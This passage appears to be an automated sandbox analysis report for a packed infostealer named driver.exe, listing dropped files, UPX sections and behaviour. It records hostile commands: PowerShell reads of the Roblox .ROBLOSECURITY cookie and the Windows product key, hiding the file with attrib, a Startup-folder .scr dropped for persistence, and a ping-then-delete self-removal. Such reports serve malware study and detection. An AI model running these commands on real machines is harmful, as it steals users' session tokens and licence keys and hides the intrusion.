              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053342813.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: driver.exe, 00000000.00000003.2054053292.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052770906.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052448279.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: driver.exe, 00000000.00000003.2050665502.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: driver.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: driver.exe, 00000002.00000002.2454712947.00007FF8B8B3B000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: driver.exe, 00000000.00000003.2051128075.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: driver.exe, 00000002.00000002.2455998173.00007FF8B9841000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2051451471.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053584283.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: driver.exe, 00000000.00000003.2052186692.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: driver.exe, 00000002.00000002.2454106900.00007FF8B8AF1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.pdbhP source: powershell.exe, 0000002F.00000002.2261891481.0000028F80385000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052933128.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: driver.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: driver.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: driver.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: driver.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: driver.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: 0x975A648E [Sun Jun 19 20:33:18 2050 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline"
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8030330 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FF8A8030330
              Source: python313.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1c507d
              Source: driver.exeStatic PE information: real checksum: 0x867137 should be: 0x8602a2
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x11179
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x4f800
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x172ba
              Source: c4gv4hox.dll.58.drStatic PE information: real checksum: 0x0 should be: 0x461d
              Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x197f77
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x26383
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1cde8
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1aa93
              Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xb09a
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x14770
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x18eb4
              Source: libssl-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x4330c
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x8e73
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x12948
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xae9be
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A7F8AC25 push rcx; ret 2_2_00007FF8A7F8AC62
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8064331 push rcx; ret 2_2_00007FF8A8064332
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF845F5D2A5 pushad ; iretd 14_2_00007FF845F5D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF84607862D push ebx; ret 14_2_00007FF8460786CA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF84607861D push ebx; ret 14_2_00007FF84607862A
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\driver.exe"
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\ucrtbase.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scrJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe""
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe""Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29B5820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF6A29B5820
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
